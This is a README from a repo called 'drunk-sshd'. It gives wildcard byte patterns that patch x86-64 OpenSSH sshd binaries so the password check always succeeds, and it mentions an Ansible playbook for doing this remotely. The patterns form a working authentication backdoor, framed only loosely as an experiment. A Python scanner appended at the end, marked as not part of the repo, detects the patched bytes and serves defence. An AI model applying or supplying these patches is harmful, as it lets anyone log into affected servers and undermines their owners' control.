ViRb3 / drunk-sshd

🍺 Byte replace patterns to make sshd accept any password as valid


Drunk SSHd

⚠️ This project was an experiment purely for fun and should be treated as such. Do NOT put in production!

Ever wondered what happens if SSHd has a little too much to drink? Well, it starts accepting any password as valid. This repo contains generic byte replace patterns that will patch any x86-64 sshd binary to accept any password as valid.

Notes

Although the patterns are as generic as possible, they are only for x86-64 and may not work on all OpenSSH versions. Tested versions are as follows:

  • Lubuntu 19.10
  • Kali 2019.4
  • Linux Mint 19.3 XFCE

The tested binaries can be found in samples.

Patching

Remote

Check out the provided Ansible playbook.

Local

Use my byte pattern patcher with this patch file and target your sshd binary. You should see three replaced occurrences, one for each pattern.

Methodology

The patterns patch every exit routine of the function

int auth_password(struct ssh *ssh, const char *password)

in auth-passwd.c so that it always returns true; the caller therefore treats every password as authenticated.

Patterns

  • Patch auth_password exit routine 1

    Search:  31 ?? 85 ?? 0f 95 ?? 21 ??
    Replace: 31 ?? ?? ?? b8 01 00 00 00

    31 [11......] 	// XOR
    85 [11......] 	// TEST
    0f 95 [11......] 	// SETNZ -> MOV EAX, 0x1
    21 [11......] 	// AND -> OVERWRITTEN

  • Patch auth_password exit routine 2
    • 2 variations (check patch file)

    Search:  21 ?? 0f b6 ?? eb ??
    Replace: b8 01 00 00 00 ?? ??

    21 [11......] 	// AND -> MOV EAX, 0x1
    0f b6 [11......] 	// MOVZX -> OVERWRITTEN
    eb [........] 	// JMP

  • Patch auth_password exit routine 3
    • 2 variations (check patch file)

    Search:  85 ?? 0f 95 ?? 83 3d ?? ?? ?? ?? 01 74 ?? 8b ?? ?? ?? ?? ?? 85 ??
    Replace: 85 ?? 0f 95 ?? 83 3d ?? ?? ?? ?? 01 74 ?? 8b ?? ?? ?? ?? ?? 39 ??

    85 [11......] 	// TEST
    0f 95 [11......] 	// SETNZ
    83 3d [........] [........] [........] [........] 01 	// CMP
    74 [........] 	// JZ
    8b [00...101] [........] [........] [........] [........] 	// MOV
    85 [11......] 	// TEST -> CMP
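The same wildcard notation can be used the other way round, to check whether an sshd binary still carries the original exit routine or the patched one. The scanner below is an added example and not part of this repo; it matches the search and replace bytes of exit routine 1 (the pattern whose replacement is fully given above) against a file, and the sample bytes are constructed. Treat the verdict as a heuristic: the authoritative check on a packaged system is the package manager's file verification (e.g. dpkg --verify or rpm -V).

```python
# Added example, not part of drunk-sshd: a read-only scanner that looks for
# the "exit routine 1" signatures from the README in a binary image.
# Assumption: a binary patched with these patterns contains the replacement
# bytes "31 ?? ?? ?? b8 01 00 00 00" where the original "31 ?? 85 ?? 0f 95 ?? 21 ??"
# used to be. All function names here are my own.
import sys
from typing import List, Optional

Pattern = List[Optional[int]]  # None is a wildcard byte ("??")


def parse_pattern(text: str) -> Pattern:
    """'31 ?? b8' -> [0x31, None, 0xb8]."""
    return [None if tok == "??" else int(tok, 16) for tok in text.split()]


def find_pattern(data: bytes, pattern: Pattern) -> List[int]:
    """Return every offset in `data` where `pattern` matches."""
    hits = []
    for off in range(len(data) - len(pattern) + 1):
        if all(p is None or data[off + i] == p for i, p in enumerate(pattern)):
            hits.append(off)
    return hits


# Search and replace bytes of exit routine 1, as listed in the README.
UNPATCHED_EXIT1 = parse_pattern("31 ?? 85 ?? 0f 95 ?? 21 ??")
PATCHED_EXIT1 = parse_pattern("31 ?? ?? ?? b8 01 00 00 00")


def classify(data: bytes) -> str:
    """Heuristic verdict: 'intact', 'patched' or 'unknown' (pattern not found)."""
    if find_pattern(data, UNPATCHED_EXIT1):
        return "intact"
    if find_pattern(data, PATCHED_EXIT1):
        return "patched"
    return "unknown"  # different build/version, or bytes not matched at all


# Constructed samples: the original sequence versus its patched form.
SAMPLE_INTACT = bytes.fromhex("9090" "31c085c00f95c021c3" "9090")
SAMPLE_PATCHED = bytes.fromhex("9090" "31c085c0b801000000" "9090")

if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    image = open(path, "rb").read() if path else SAMPLE_PATCHED
    print(f"{path or 'constructed sample'}: {classify(image)}")
```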
